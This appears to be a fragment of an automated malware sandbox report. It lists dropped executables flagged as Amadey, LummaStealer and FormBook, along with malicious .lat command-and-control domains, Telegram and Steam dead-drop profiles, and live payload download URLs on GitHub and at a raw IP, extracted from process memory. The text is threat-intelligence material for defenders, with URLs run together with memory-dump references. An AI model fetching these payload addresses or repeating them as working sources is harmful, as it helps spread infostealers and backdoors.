                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[4].exe67%ReversingLabsByteCode-MSIL.Backdoor.FormBook
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe57%ReversingLabsByteCode-MSIL.Trojan.Zilla
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[3].exe58%ReversingLabsWin32.Trojan.Generic
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[4].exe8%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[5].exe28%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe87%ReversingLabsWin32.Trojan.Amadey
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[3].exe68%ReversingLabsWin32.Trojan.LummaStealer
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1]75%ReversingLabsByteCode-MSIL.Trojan.Malgent
                      C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe87%ReversingLabsWin32.Trojan.Amadey
                      C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe57%ReversingLabsByteCode-MSIL.Trojan.Zilla
                      C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe38%ReversingLabsWin32.Infostealer.Generic
                      C:\Users\user\AppData\Local\Temp\1019035001\964c9facda.exe58%ReversingLabsWin32.Trojan.Generic
                      C:\Users\user\AppData\Local\Temp\1019036001\164919d456.exe68%ReversingLabsWin32.Trojan.LummaStealer
                      C:\Users\user\AppData\Local\Temp\1019037001\9905c00c72.exe8%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\1019038001\fcd2b0e3cd.exe67%ReversingLabsByteCode-MSIL.Backdoor.FormBook
                      C:\Users\user\AppData\Local\Temp\1019040001\73c096c84a.exe28%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\1v1w92NeCw3SKGKedet\Bunifu_UI_v1.5.3.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\1v1w92NeCw3SKGKedet\Y-Cleaner.exe75%ReversingLabsByteCode-MSIL.Trojan.Malgent
                      C:\Users\user\AppData\Local\Temp\main\7z.dll0%ReversingLabs
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      No contacted domains info
                      NameMaliciousAntivirus DetectionReputation
                      https://steamcommunity.com/profiles/76561199809363512true
                        aspecteirs.lattrue
                          sweepyribs.lattrue
                            sustainskelet.lattrue
                              rapeflowwj.lattrue
                                energyaffai.lattrue
                                  grannyejh.lattrue
                                    necklacebudi.lattrue
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://duckduckgo.com/chrome_newtab77594b3442.exe, 00000031.00000003.2935489662.00000000052EB000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934403665.00000000052EE000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934894948.00000000052EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                        https://duckduckgo.com/ac/?q=77594b3442.exe, 00000031.00000003.2935489662.00000000052EB000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934403665.00000000052EE000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934894948.00000000052EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                          https://discokeyus.lat/U77594b3442.exe, 00000031.00000003.3137575871.0000000000515000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.3075295928.0000000000515000.00000004.00000020.00020000.00000000.sdmpfalse
                                            http://schemas.datacontract.org5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D549F000.00000004.00000800.00020000.00000000.sdmp, 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D57CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                              https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.77594b3442.exe, 00000031.00000003.3040740995.000000000053B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                http://schemas.datacontract.org/2004/07/StoreInstaller.Models5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D549F000.00000004.00000800.00020000.00000000.sdmp, 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D57CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 0000002D.00000003.2733073587.000001EE6AD03000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000002D.00000003.2733073587.000001EE6AD22000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000002D.00000003.2733073587.000001EE6AD48000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000002D.00000003.2733073587.000001EE6AD67000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000002D.00000003.2733073587.000001EE6AD54000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    http://schemas.datacontract.org/2004/07/StoreInstaller.ModelspXu5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D57CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      https://discokeyus.lat/c77594b3442.exe, 00000031.00000003.3137575871.0000000000515000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        https://t.me/k04ael4268204ace.exe, 0000000F.00000002.2742198429.0000000003B95000.00000004.00000800.00020000.00000000.sdmp, 4268204ace.exe, 0000000F.00000002.2729833635.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, 4268204ace.exe, 0000000F.00000002.2742198429.0000000003CBA000.00000004.00000800.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2745507177.00000000007A8000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000000.2720818695.0000000000423000.00000008.00000001.01000000.00000013.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2776399397.0000000000790000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2745507177.000000000079D000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2776399397.0000000000779000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          https://curl.se/docs/hsts.html9c2981f3e5.exe, 0000002A.00000003.2686987170.0000000007370000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            https://g.live.com/odclientsettings/Prod.C:svchost.exe, 0000002D.00000003.2733073587.000001EE6ACD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              http://defaultcontainer/StoreInstaller;component/Resources/Theme/Light.xaml5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D5708000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                https://frostman.shop/#7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2824507847.00000000007A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  https://grannyejh.lat:443/api77594b3442.exe, 00000039.00000002.3103939592.0000000000549000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    https://aka.ms/pscore6lBpowershell.exe, 00000020.00000002.2595289423.0000000005321000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2631755685.0000000005091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi77594b3442.exe, 00000031.00000003.3040740995.000000000053B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        https://frostman.shop//7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2872982174.00000000007A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          https://nuget.org/nuget.exepowershell.exe, 00000020.00000002.2598419733.0000000006387000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2642561965.00000000060F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            https://discokeyus.lat/l77594b3442.exe, 00000039.00000003.3063497186.0000000000575000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000039.00000002.3104578420.0000000000575000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              http://185.156.73.23/K0577f55121.exe, 0000002E.00000003.3228694024.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3202086239.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3146323550.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3176254742.0000000005552000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                http://defaultcontainer/StoreInstaller;component/Resources/StoreAppList.Light.png5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D551B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  https://github.com/Urijas/moperats/raw/refs/heads/main/ktyihkdfesf.exe4268204ace.exe, 0000000F.00000000.2555729362.00000000007D2000.00000002.00000001.01000000.0000000C.sdmp, 4268204ace.exe, 0000000F.00000002.2729833635.0000000002B59000.00000004.00000800.00020000.00000000.sdmp, 4268204ace.exe, 0000000F.00000002.2729833635.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name4268204ace.exe, 0000000F.00000002.2729833635.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2595289423.0000000005321000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2631755685.0000000005091000.00000004.00000800.00020000.00000000.sdmp, 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D551B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 0000002D.00000003.2733073587.000001EE6AD22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc9477594b3442.exe, 00000031.00000003.3040740995.000000000053B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          https://raw.githubusercontent.comD4268204ace.exe, 0000000F.00000002.2729833635.0000000002C75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            http://schemas.datacontract.org/5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D549F000.00000004.00000800.00020000.00000000.sdmp, 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D57CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000028.00000002.2631755685.00000000051E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000020.00000002.2595289423.0000000005475000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2631755685.00000000051E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  http://schemas.datacontract.org/2004/07/5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D549F000.00000004.00000800.00020000.00000000.sdmp, 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D57CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000028.00000002.2631755685.00000000051E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      https://t.me/p7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2745507177.00000000007A8000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2745170967.00000000007A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        https://contoso.com/Iconpowershell.exe, 00000028.00000002.2642561965.00000000060F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=77594b3442.exe, 00000031.00000003.2935489662.00000000052EB000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934403665.00000000052EE000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934894948.00000000052EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            http://crl.rootca1.amazontrust.com/rootca1.crl077594b3442.exe, 00000031.00000003.3012434030.00000000052D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta77594b3442.exe, 00000031.00000003.3040740995.000000000053B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                https://t.me/k04aelm0nk3Mozilla/5.07d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000000.2720818695.0000000000423000.00000008.00000001.01000000.00000013.sdmpfalse
                                                                                                                  https://raw.githubusercontent.com/Urijas/moperats/refs/heads/main/biyjdfjadaw.exe4268204ace.exe, 0000000F.00000002.2729833635.0000000002C0C000.00000004.00000800.00020000.00000000.sdmp, 4268204ace.exe, 0000000F.00000002.2729833635.0000000002C75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    http://ocsp.rootca1.amazontrust.com0:77594b3442.exe, 00000031.00000003.3012434030.00000000052D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201677594b3442.exe, 00000031.00000003.2968639998.00000000052FA000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2942066458.00000000052FA000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2970465845.00000000052FA000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2941963499.0000000005301000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2968949040.00000000052FA000.00000004.00000800.00020000.00000000.sdmp, 513dad5c05.exe, 00000038.00000003.3191808258.0000000005610000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        https://curl.se/docs/alt-svc.html9c2981f3e5.exe, 0000002A.00000003.2686987170.0000000007370000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                          https://xmrig.com/wizardIntel_PTT_EK_Recertification.exe, 00000022.00000003.2591781402.00000237117F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000024.00000002.2597932225.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, explorer.exe, 00000033.00000002.2995871768.00000001402DD000.00000002.00000001.00020000.00000000.sdmpfalse
                                                                                                                            https://www.ecosia.org/newtab/77594b3442.exe, 00000031.00000003.2935489662.00000000052EB000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934403665.00000000052EE000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934894948.00000000052EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br77594b3442.exe, 00000031.00000003.3014208025.000000000565E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                https://github.com/Pester/Pesterpowershell.exe, 00000028.00000002.2631755685.00000000051E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  http://www.w3.oh5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D549F000.00000004.00000800.00020000.00000000.sdmp, 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D57CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    http://defaultcontainer/StoreInstaller;component/Resources/app.Light.ico5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D5708000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      https://httpbin.org/ipbefore9c2981f3e5.exe, 0000002A.00000003.2686987170.0000000007370000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                        http://185.156.73.23/files/download10577f55121.exe, 0000002E.00000003.3228694024.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3202086239.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3146323550.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3176254742.0000000005552000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          http://crl.micropowershell.exe, 00000028.00000002.2650660528.0000000008A62000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.3148185991.00000000004FE000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000039.00000003.3060235969.00000000005B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            https://raw.githubusercontent.com4268204ace.exe, 0000000F.00000002.2729833635.0000000002C75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              http://foo/Resources/StoreLogo.Light.png5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D551B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                https://support.microsof77594b3442.exe, 00000031.00000003.2941963499.0000000005301000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000020.00000002.2595289423.0000000005475000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2631755685.00000000051E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    https://steamcommunity.com/profiles/76561199809363512m0nk3Mozilla/5.07d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000000.2720818695.0000000000423000.00000008.00000001.01000000.00000013.sdmpfalse
                                                                                                                                                      http://raw.githubusercontent.com4268204ace.exe, 0000000F.00000002.2729833635.0000000002C75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        https://frostman.shop/7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2872982174.00000000007A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          http://185.156.73.23/files/download0577f55121.exe, 0000002E.00000003.3176254742.0000000005552000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            https://frostman.shop/d$7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2923711164.00000000007A8000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2898848742.00000000007A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              http://185.156.73.23/dll/key0577f55121.exe, 0000002E.00000003.3228694024.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3202086239.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3146323550.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3176254742.0000000005552000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                https://discokeyus.lat:443/api77594b3442.exe, 00000031.00000003.2969030804.00000000052A6000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2968852424.00000000052A6000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000039.00000002.3103939592.0000000000549000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples77594b3442.exe, 00000031.00000003.2942066458.00000000052D5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    https://t.me/Iu7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2745507177.00000000007A8000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2745170967.00000000007A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      http://185.156.73.23/files/downloadK0577f55121.exe, 0000002E.00000003.3228694024.0000000005552000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        http://html4/loose.dtd9c2981f3e5.exe, 0000002A.00000003.2686987170.0000000007370000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                          https://t.me/7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2745507177.00000000007A8000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2745170967.00000000007A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            http://185.156.73.23/files/downloadM0577f55121.exe, 0000002E.00000003.3228694024.0000000005552000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              https://frostman.shop/u%7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2824507847.00000000007A7000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2801209203.00000000007A7000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2775102059.00000000007A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                https://web.telegram.org7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2745170967.00000000007A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  https://github.com4268204ace.exe, 0000000F.00000002.2729833635.0000000002BCE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    https://t.me/07d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2745170967.00000000007A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      https://contoso.com/Licensepowershell.exe, 00000028.00000002.2642561965.00000000060F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        https://frostman.shop/w7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2923711164.00000000007A8000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2898848742.00000000007A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=77594b3442.exe, 00000031.00000003.2935489662.00000000052EB000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934403665.00000000052EE000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934894948.00000000052EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            http://foo/bar/resources/storelogo.light.png5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D551B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              https://discokeyus.lat/apion_pre77594b3442.exe, 00000031.00000003.3075295928.0000000000524000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.3137575871.0000000000524000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                https://discokeyus.lat/api77594b3442.exe, 00000031.00000003.3040855267.00000000052A9000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.3148807130.00000000052B1000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.3148640294.00000000052AE000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.3075295928.0000000000507000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2968852424.00000000052A6000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000039.00000003.3063497186.0000000000575000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000039.00000002.3103939592.0000000000552000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000039.00000002.3104578420.0000000000575000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000039.00000002.3104470563.000000000056D000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000039.00000003.3063570796.000000000056D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e1777594b3442.exe, 00000031.00000003.2968639998.00000000052FA000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2942066458.00000000052FA000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2970465845.00000000052FA000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2941963499.0000000005301000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2968949040.00000000052FA000.00000004.00000800.00020000.00000000.sdmp, 513dad5c05.exe, 00000038.00000003.3191808258.0000000005610000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    http://.css9c2981f3e5.exe, 0000002A.00000003.2686987170.0000000007370000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      http://185.156.73.23/files/downloadc0577f55121.exe, 0000002E.00000003.3228694024.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3202086239.0000000005552000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        https://discokeyus.lat:443/apiK77594b3442.exe, 00000031.00000003.3040855267.00000000052AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          http://foo/bar/resources/app.light.ico5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D5708000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            http://github.com4268204ace.exe, 0000000F.00000002.2729833635.0000000002BEC000.00000004.00000800.00020000.00000000.sdmp, 4268204ace.exe, 0000000F.00000002.2729833635.0000000002BDA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              https://github.com/Urijas/moperats/raw/refs/heads/main/biyjdfjadaw.exe4268204ace.exe, 0000000F.00000000.2555729362.00000000007D2000.00000002.00000001.01000000.0000000C.sdmp, 4268204ace.exe, 0000000F.00000002.2729833635.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, 4268204ace.exe, 0000000F.00000002.2729833635.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                https://g.live.com/odclientsettings/ProdV2svchost.exe, 0000002D.00000003.2733073587.000001EE6AD22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  https://t.me/k04aell7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2776399397.0000000000779000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    http://x1.c.lencr.org/077594b3442.exe, 00000031.00000003.3012434030.00000000052D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      http://x1.i.lencr.org/077594b3442.exe, 00000031.00000003.3012434030.00000000052D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        https://discokeyus.lat/api-77594b3442.exe, 00000031.00000003.3082778417.00000000052AA000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.3148640294.00000000052AB000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.3075604245.00000000052AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install77594b3442.exe, 00000031.00000003.2942066458.00000000052D5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search77594b3442.exe, 00000031.00000003.2935489662.00000000052EB000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934403665.00000000052EE000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934894948.00000000052EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                                              • 75% < No. of IPs
                                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                              185.215.113.43
                                                                                                                                                                                                                              unknownPortugal
                                                                                                                                                                                                                              206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                                                                                                              185.121.15.192
                                                                                                                                                                                                                              unknownSpain
                                                                                                                                                                                                                              207046REDSERVICIOESfalse
                                                                                                                                                                                                                              1.1.1.1
                                                                                                                                                                                                                              unknownAustralia
